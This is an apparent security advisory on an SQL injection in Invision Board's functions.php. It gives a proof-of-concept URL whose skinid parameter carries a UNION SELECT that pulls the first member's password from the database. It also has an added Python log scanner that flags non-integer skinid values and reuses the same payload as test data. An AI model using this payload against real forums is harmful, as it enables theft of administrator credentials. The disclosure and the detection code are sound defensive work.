Invision Board functions.php SQL Injection Vulnerability

The following proof of concept has been submitted by Timo 'SiGiN' Valeri <sigin@ukr.net>:

http://www.example.com/index.php?skinid=99+AND+s.hidden%3D0+UNION+SELECT+s.*%2C+t.template%2C+c.password+FROM+ibf_skins+s+LEFT+JOIN+ibf_templates+t+ON+%28t.tmid%3Ds.tmpl_id%29+LEFT+JOIN+ibf_members+c+ON+%28c.id%3D1%29+WHERE+s.sid%3D1+AND+s.hidden%3D0
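
A defensive check for the request above, added here as an example and not part of the original advisory: it URL-decodes each logged query string and flags skinid values that are not plain integers. The log lines are constructed, and treating skinid as integer-only is an assumption drawn from the skinid=99 prefix of the proof of concept.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request path taken from the proof of concept on this page.
POC_PATH = (
    "/index.php?skinid=99+AND+s.hidden%3D0+UNION+SELECT+s.*%2C+t.template%2C+c.password"
    "+FROM+ibf_skins+s+LEFT+JOIN+ibf_templates+t+ON+%28t.tmid%3Ds.tmpl_id%29"
    "+LEFT+JOIN+ibf_members+c+ON+%28c.id%3D1%29+WHERE+s.sid%3D1+AND+s.hidden%3D0"
)
# Constructed access-log lines (combined log format, documentation IP addresses).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2010:10:00:00 +0000] "GET /index.php?skinid=3 HTTP/1.1" 200 5120',
    '192.0.2.77 - - [01/Jan/2010:10:00:05 +0000] "GET ' + POC_PATH + ' HTTP/1.1" 200 9876',
    '192.0.2.10 - - [01/Jan/2010:10:00:09 +0000] "GET /index.php?showtopic=12 HTTP/1.1" 200 4096',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
NUMERIC_PARAMS = ("skinid",)  # assumption: these parameters only ever carry integers


def suspicious_requests(lines):
    """Return (client_ip, param, decoded_value) for non-integer numeric parameters."""
    hits = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        # parse_qs decodes both %xx escapes and '+', so encoded SQL is matched in clear text
        query = parse_qs(urlsplit(match.group(1)).query, keep_blank_values=True)
        for name in NUMERIC_PARAMS:
            for value in query.get(name, []):
                # Allow-list check: anything other than a short run of digits is reported
                if not re.fullmatch(r"\d{1,10}", value):
                    hits.append((line.split(" ", 1)[0], name, value))
    return hits


if __name__ == "__main__":
    for ip, name, value in suspicious_requests(SAMPLE_LOG):
        print(f"{ip} {name}={value!r}")
```

The same allow-list test (digits only) is what the application should apply to skinid before the value reaches a SQL query.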


 

Copyright 2010, SecurityFocus